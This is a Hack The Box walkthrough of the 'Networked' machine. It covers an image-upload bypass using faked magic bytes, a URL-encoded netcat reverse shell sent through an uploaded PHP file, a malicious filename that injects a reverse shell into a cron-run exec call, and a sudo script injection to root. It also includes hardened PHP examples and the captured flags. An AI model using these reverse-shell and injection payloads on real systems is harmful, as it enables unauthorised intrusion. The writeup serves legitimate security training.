Linux Boxes

networked

  1. nmapAutomator.sh
    1. nmap
      1. nmap vulns
    2. recon
      1. gobuster
        1. index.php
        2. /photos.php
        3. lib.php
        4. /upload.php
        5. /uploads
        6. /backup
          1. extract backup.tar
      2. nikto
  2. initial foothold
    1. upload.php backup
    2. magic bytes for png
    3. upload cmd.php
    4. cmd.php RCE
    5. reverse shell
  3. privesc to guly
    1. check_attack.php
      1. exfiltrate file with base64 encode
      2. lib.php changes?
      3. scandir
      4. touch -- '; nc -c bash 10.10.14.62 1234.php'
      5. reverse shell
  4. priv esc to root
    1. changename.sh
      1. vuln
      2. POC
  5. user/root
  6. lessons learned

networked

nmapAutomator.sh

nmap

recon

nmap

ssh running on port 22
http running on port 80


nmap vulns

recon

gobuster
nikto



gobuster

status 200
/photos.php
/index.php
/lib.php
/upload.php

status 301
/uploads
/backup

index.php

/photos.php

lib.php

blank page

/upload.php

a very interesting find: we may be able to upload a reverse shell here

/uploads

blank page

/backup

a compressed backup file (backup.tar); let's download it

extract backup.tar

Quick tar extraction for those unfamiliar: tar -xvf backup.tar unpacks the archive into the current directory (x extracts, v lists each file as it is written, f names the archive file)

nikto

initial foothold

first, let's move our php reverse shell into our working directory

we can either upload a malicious php file that gives us RCE, or upload a php script that calls a shell back to us; either will work

upload.php backup

sifting through the 4 files extracted from the compressed backup file, upload.php is worth checking for potential vulnerabilities

breaking this code down, upload.php is vulnerable to magic byte spoofing, because it judges the validity of an upload on just 2 checks:
1. whether the filename ends in a proper picture file suffix
2. whether a simple file command on the upload deems it a picture

If the upload passes both checks, it is given execute permissions; neither check verifies that the file as a whole is really an image, which is the gap exploited next
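The weak two-check validation described above beside a hardened form, as an added PHP example (not code from the box's upload.php or from this writeup); the function names, the accepted image types and the destination directory are assumptions.

```php
<?php
// Added example, not the box's upload.php: the weak two-check validation
// described above, beside a hardened version. Names are assumptions.

// Weak: a suffix test on the client-supplied name plus a magic-byte test.
// A file named cmd.php.png whose content starts with "GIF8" passes both.
function weak_image_check(string $client_name, string $tmp_path): bool
{
    $suffix_ok = preg_match('/\.(png|jpe?g|gif)$/i', $client_name) === 1;
    $head = (string) file_get_contents($tmp_path, false, null, 0, 4);
    $magic_ok = str_starts_with($head, "\x89PNG")
             || str_starts_with($head, "\xFF\xD8\xFF")
             || str_starts_with($head, "GIF8");
    return $suffix_ok && $magic_ok;
}

// Hardened: decide the type from the bytes, prove the file decodes as an
// image by re-encoding it, and store it under a server-chosen name with a
// single extension. Returns the stored name, or null if rejected.
function store_image_hardened(string $tmp_path, string $dest_dir): ?string
{
    $allowed = ['image/png' => 'png', 'image/jpeg' => 'jpg', 'image/gif' => 'gif'];

    // 1. libmagic on the content; the client's filename and MIME are ignored.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($tmp_path);
    if (!isset($allowed[$mime])) {
        return null;
    }
    // 2. A four-byte signature glued to PHP code is not a decodable image;
    //    re-encoding also strips anything that is not pixel data.
    $img = @imagecreatefromstring((string) file_get_contents($tmp_path));
    if ($img === false) {
        return null;
    }
    // 3. Random base name, one extension chosen by the server: a name such
    //    as x.php.png never reaches disk, so no handler keyed on ".php" can
    //    match it. $dest_dir should also not be served with PHP enabled.
    $ext  = $allowed[$mime];
    $name = bin2hex(random_bytes(16)) . '.' . $ext;
    $path = rtrim($dest_dir, '/') . '/' . $name;
    $ok = match ($ext) {
        'png' => imagepng($img, $path),
        'jpg' => imagejpeg($img, $path),
        'gif' => imagegif($img, $path),
    };
    imagedestroy($img);
    return $ok ? $name : null;
}
```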

magic bytes for png

since we know png is an accepted filetype, let's upload a legitimate png file to the server and intercept the request with Burp Suite to see what its magic bytes look like

upload to /upload.php

now let's upload our php script, intercept the request with Burp Suite, and paste a line or two of those png magic bytes in front of it

upload cmd.php

first, choose the file

second, intercept it

send it to Repeater, rename cmd.php to cmd.php.png and add the png magic bytes "GIF8" above our php script (strictly speaking GIF8 is the GIF signature rather than PNG's, but the file check accepts it just the same)

and we see it's uploaded

cmd.php RCE

let's navigate to the URL of the file we just uploaded

if we visit /photos.php we can see the files we've uploaded

right-clicking our uploaded php file will let us use it for RCE through the miao parameter:

http://10.10.10.146/uploads/10_10_14_62.php.jpeg?miao=whoami

reverse shell

here I'll grab the netcat OpenBSD reverse shell from PayloadsAllTheThings

and URL-encode it with Burp

set this as the value of miao and set up a listener on port 4242

http://10.10.10.146/uploads/10_10_14_62.php.jpeg?miao=%72%6d%20%2f%74%6d%70%2f%66%3b%6d%6b%66%69%66%6f%20%2f%74%6d%70%2f%66%3b%63%61%74%20%2f%74%6d%70%2f%66%7c%2f%62%69%6e%2f%73%68%20%2d%69%20%32%3e%26%31%7c%6e%63%20%31%30%2e%31%30%2e%31%34%2e%36%32%20%34%32%34%32%20%3e%2f%74%6d%70%2f%66

and we have our foothold!


privesc to guly

with user apache's privileges we can get into guly's home directory; we cannot read the user.txt flag yet, but we see some interesting files


check_attack.php

exfiltrate file with base64 encode

encode the file on the target with base64 <filename>

copy the resulting string, then on our machine echo -n "<string>", pipe it to base64 -d to decode it, and redirect the output to a file: > check_attack.php

now we have a prettier copy of the program to work with

lib.php changes?

we see that the script requires lib.php, so let's see if we can change it

unfortunately we don't have write permissions to it

scandir

let's see exactly what scandir does using our own environment

we see it scans the directory it's given, returning the names of the files and directories in it!

now looking at check_attack.php again, we see we have control of the $value parameter: since we can upload files to our victim, we just need to name a file something malicious and it will get executed by php exec without any sanitisation!

exec can run multiple commands on one line if they are separated by a semicolon, so let's use that to our advantage here and get a little creative

if we separate $path and $value with a semicolon ';' we can write malicious code after it
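The unsafe pattern described above beside a removal routine that never hands the filename to a shell, as an added PHP example (not code from the box's check_attack.php or from this writeup); the function names and the '/path/to/uploads' placeholder are assumptions.

```php
<?php
// Added example, not the box's check_attack.php: a directory entry
// interpolated into exec, beside a safe removal. Names and the
// '/path/to/uploads' placeholder are assumptions.

// Unsafe: the entry name becomes part of a shell command line, so a name
// containing ';' ends the rm command and whatever follows runs as the
// user the scheduled task runs as.
function remove_unsafe(string $path, string $value): void
{
    exec("rm -f $path$value");
}

// Safe: treat the name as data. No shell is involved at any point.
function remove_safe(string $path, string $value): bool
{
    // 1. Only a bare directory entry is acceptable, never a relative path.
    if ($value === '' || $value !== basename($value)
        || $value === '.' || $value === '..') {
        return false;
    }
    // 2. Resolve both sides and require the target to sit directly inside
    //    the uploads directory (this also refuses symlinks pointing out).
    $dir    = realpath($path);
    $target = realpath($path . DIRECTORY_SEPARATOR . $value);
    if ($dir === false || $target === false || dirname($target) !== $dir) {
        return false;
    }
    // 3. unlink() receives the name as an argument, not as shell syntax.
    return unlink($target);
}

// If a shell command is truly unavoidable, quote every interpolated piece:
// escapeshellarg() wraps the whole path in single quotes, so a name such as
// "; nc -c bash 10.10.14.62 1234.php" stays one argument to rm.
function remove_command_quoted(string $path, string $value): string
{
    return 'rm -f ' . escapeshellarg($path . DIRECTORY_SEPARATOR . $value);
}
```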



touch -- '; nc -c bash 10.10.14.62 1234.php'

let's add a file to the directory whose name begins with a semicolon, to break out of the check_attack command and run a reverse shell

touch -- '; nc -c bash 10.10.14.62 1234.php'

where
-- tells touch that what follows is a filename rather than an option, and the leading ';' terminates the initial exec command
and
nc -c bash 10.10.14.62 1234.php is our reverse shell call

(we want the filename to end in .php so check_attack will think we're attacking it and run the exec function)

this is what the directory should look like

reverse shell

check_attack.php runs every 3 minutes since it's a scheduled task

so it's only a matter of time until our shell connects back

priv esc to root

running sudo -l to list what we are allowed to run with sudo


changename.sh

vuln

first we must note the regular expression of characters this program allows in its input

we see that \ / in the pattern allows us to use a space

this code reads in our input and writes it back out as the value of x

now if we declare a variable in bash and put a command right after it on the same line, we see that our command runs after the variable declaration


POC

if we enter a space followed by bash in any of the changename.sh inputs, it will execute as root

and we see we are root!

user/root

user flag: 526cfc2305f17faaacecf212c57d71c5

root flag: 0a8ecda83f1d81251099e8ac3d0dcb82

lessons learned

Check out Rana Khalil's OSCP writeups and prep at https://rana-khalil.gitbook.io/hack-the-box-oscp-preparation/
